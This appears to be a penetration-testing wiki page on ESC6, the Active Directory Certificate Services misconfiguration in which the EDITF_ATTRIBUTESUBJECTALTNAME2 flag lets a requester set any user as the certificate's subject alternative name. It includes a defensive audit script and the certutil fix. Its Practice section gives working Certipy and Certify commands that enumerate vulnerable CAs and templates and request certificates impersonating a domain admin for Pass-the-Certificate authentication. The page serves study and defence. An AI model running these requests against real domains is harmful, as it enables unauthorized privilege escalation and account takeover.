CA configuration

Theory

In their research paper "Certified Pre-Owned", Will Schroeder and Lee Christensen described a domain escalation vector based on a dangerous CA setting: the EDITF_ATTRIBUTESUBJECTALTNAME2 flag. The escalation vector was dubbed ESC6.
When the flag is set on the CA, the requester can supply a subjectAltName (SAN) with any certificate request, regardless of what the template allows. Templates configured for authentication (i.e. EKUs like Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose (OID 2.5.29.37.0), or no EKU (SubCA)) that allow low-privileged users to enroll can then be abused to authenticate as any other user, machine or admin.
The default User template meets all the template requirements stated above.
If the CA is configured with the EDITF_ATTRIBUTESUBJECTALTNAME2 flag (admins tend to enable that flag without knowing the security implications) and the User template is enabled (which is very often the case), any user can escalate to domain admin.
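As an added example (not Certipy's or Certify's code, nor part of the original page), the audit script below parses a constructed sample of `certutil -getreg policy\EditFlags` output from a CA and reports whether the EDITF_ATTRIBUTESUBJECTALTNAME2 bit (0x40000 in the EditFlags DWORD) is set; the CA name in the sample is made up.

```python
"""Audit a CA's EditFlags registry value for the ESC6 precondition."""
import re

# Bit value of EDITF_ATTRIBUTESUBJECTALTNAME2 as defined by AD CS (certsrv.h).
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

# Constructed (abbreviated) sample of `certutil -getreg policy\EditFlags` output
# on a CA where the flag was enabled. The CA name is fictitious.
SAMPLE_CERTUTIL_OUTPUT = """\
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\CertSvc\\Configuration\\corp-CA01-CA\\PolicyModules\\CertificateAuthority_MicrosoftDefault.Policy:

  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
CertUtil: -getreg command completed successfully.
"""

# certutil prints the DWORD as a hex value followed by the decimal in parentheses.
EDITFLAGS_RE = re.compile(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)")


def parse_editflags(certutil_output: str) -> int:
    """Return the EditFlags DWORD parsed from certutil output."""
    match = EDITFLAGS_RE.search(certutil_output)
    if not match:
        raise ValueError("EditFlags line not found in certutil output")
    return int(match.group(1), 16)


def esc6_exposed(editflags: int) -> bool:
    """True if the CA honours requester-supplied SANs on every template (ESC6)."""
    return bool(editflags & EDITF_ATTRIBUTESUBJECTALTNAME2)


def remediated_editflags(editflags: int) -> int:
    """EditFlags with only the dangerous bit cleared; other settings are kept."""
    return editflags & ~EDITF_ATTRIBUTESUBJECTALTNAME2


def audit(certutil_output: str) -> dict:
    """Parse the output and summarise the ESC6 exposure in one dictionary."""
    flags = parse_editflags(certutil_output)
    return {"editflags": flags, "esc6": esc6_exposed(flags),
            "remediated": remediated_editflags(flags)}


if __name__ == "__main__":
    result = audit(SAMPLE_CERTUTIL_OUTPUT)
    print(f"EditFlags = 0x{result['editflags']:x}")
    if result["esc6"]:
        print("EDITF_ATTRIBUTESUBJECTALTNAME2 is set: authentication templates are ESC6-exposed")
        print(f"Value after clearing the bit: 0x{result['remediated']:x}")
    else:
        print("EDITF_ATTRIBUTESUBJECTALTNAME2 is not set")
```

The flag is cleared on the CA with `certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2` followed by a restart of the CertSvc service.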

Practice

UNIX-like

From UNIX-like systems, Certipy (Python) can be used to enumerate information about the CAs, including the "User Specified SAN" flag state, which is an alias of the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.

certipy find 'domain.local'/'user':'password'@'domain_controller'
grep "User Specified SAN" "DATE_Certipy.txt"

By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.
Certipy's auto mode can also be used to automatically abuse a misconfigured CA.
The same "find" command also enumerates information about the certificate templates (EKUs allowing authentication, enrollment rights granted to low-privileged users, etc.).

certipy find 'domain.local'/'user':'password'@'domain_controller'

Once the right template is found (e.g. the default User template), a certificate is requested with a high-privileged user set as the SAN (subjectAltName).

certipy req 'domain.local'/'user':'password'@'ca_server' -ca 'ca_name' -template 'certificate template' -alt 'domain admin'

The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.
Windows

From Windows systems, the Certify (C#) tool can be used to enumerate information about the CAs, including the "UserSpecifiedSAN" flag state, which refers to the EDITF_ATTRIBUTESUBJECTALTNAME2 flag.

Certify.exe cas

If the flag is enabled on a CA, Certify can then be used to find all enabled templates configured with EKUs allowing authentication and granting enrollment rights to low-privileged users.

Certify.exe /enrolleeSuppliesSubject
Certify.exe /clientauth

Once the right template is found (e.g. the default User template), a certificate is requested with a high-privileged user set as the SAN (subjectAltName).

Certify.exe request /ca:'domain\ca' /template:"Certificate template" /altname:"admin"

The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.

Resources

Certified Pre-Owned (posts.specterops.io): https://posts.specterops.io/certified-pre-owned-d95910965cd2
Hidden Dangers: Certificate Subject Alternative Names (SANs) (Keyfactor)
Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! (Medium)